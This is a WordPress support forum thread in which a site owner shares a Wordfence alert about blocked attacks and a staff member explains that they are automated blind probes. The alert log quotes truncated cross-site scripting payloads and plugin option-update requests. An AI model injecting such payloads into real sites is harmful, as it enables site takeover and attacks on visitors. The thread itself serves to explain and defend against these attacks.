Title: Increased attacks
Last modified: July 1, 2019

---

# Increased attacks

 *  Resolved [RSV-blog](https://wordpress.org/support/users/rsv-blog/)
 * (@rsv-blog)
 * [6 years, 11 months ago](https://wordpress.org/support/topic/increased-attacks-2/)
 * I just got an email with this notification:
 * he Wordfence Web Application Firewall has blocked 134 attacks over the last 10
   minutes. Below is a sample of these recent attacks:
 * July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 1.8.10–
   Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style>
   <script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(
   98ê
    July 1, 2019 6:23pm 222.73.242.180 (China) Blocked for WP GDPR Compliance
   <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
   July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 1.8.10–
   Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style>
   <script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(
   98ê July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 
   1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css
   =</style><script async=true type=text/javascript language=javascript>var nt =
   String.fromCharCode(98ê July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for
   XSS: Cross Site Scripting in POST body: domain=</script><script async=true type
   =text/javascript language=javascript>var nt = String.fromCharCode(9ê July 1, 
   2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross Site Scripting in 
   POST body: css=</style><script async=true type=text/javascript language=javascript
   >var nt = String.fromCharCode(98ê July 1, 2019 6:23pm 91.134.140.200 (France)
   Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea
   ><script async=true type=text/javascript language=javascript>var nt = String.
   fromCharCodeê July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross
   Site Scripting in POST body: otw_pctl_custom_css=</textarea><script async=true
   type=text/javascript language=javascript>var nt = String.fromCharCodeê July 1,
   2019 6:23pm 222.73.242.180 (China) Blocked for Yellow Pencil Visual Theme Customizer
   <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=3 July 1, 2019
   6:23pm 91.134.140.200 (France) Blocked for Total Donations (all known versions)–
   Multiple Unauthenticated AJAX Actions
 * I notice that a number of them say “Scripting in POST body” – where exactly is
   this posting happening? Comments are turned off for all posts and pages on the
   site.
 * Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [wfdave](https://wordpress.org/support/users/wfdave/)
 * (@wfdave)
 * [6 years, 11 months ago](https://wordpress.org/support/topic/increased-attacks-2/#post-11690814)
 * Hi [@rsv-blog](https://wordpress.org/support/users/rsv-blog/),
 * These attacks are simply blind attempts to see if your website is vulnerable.
   The attacker does not visit your site and fill in any forms normally. Instead,
   they send a direct POST request with all the fields filled in and see how your
   site responds.
 * In this situation, Wordfence detected that the fields the attacker sent were 
   malicious and therefore blocked the request. So even if your website was vulnerable
   to these attacks, Wordfence has made sure that these attacks never even reach
   your website.
 * Dave
 *  Thread Starter [RSV-blog](https://wordpress.org/support/users/rsv-blog/)
 * (@rsv-blog)
 * [6 years, 11 months ago](https://wordpress.org/support/topic/increased-attacks-2/#post-11690891)
 * Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Increased attacks’ is closed to new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

 * 2 replies
 * 2 participants
 * Last reply from: [RSV-blog](https://wordpress.org/support/users/rsv-blog/)
 * Last activity: [6 years, 11 months ago](https://wordpress.org/support/topic/increased-attacks-2/#post-11690891)
 * Status: resolved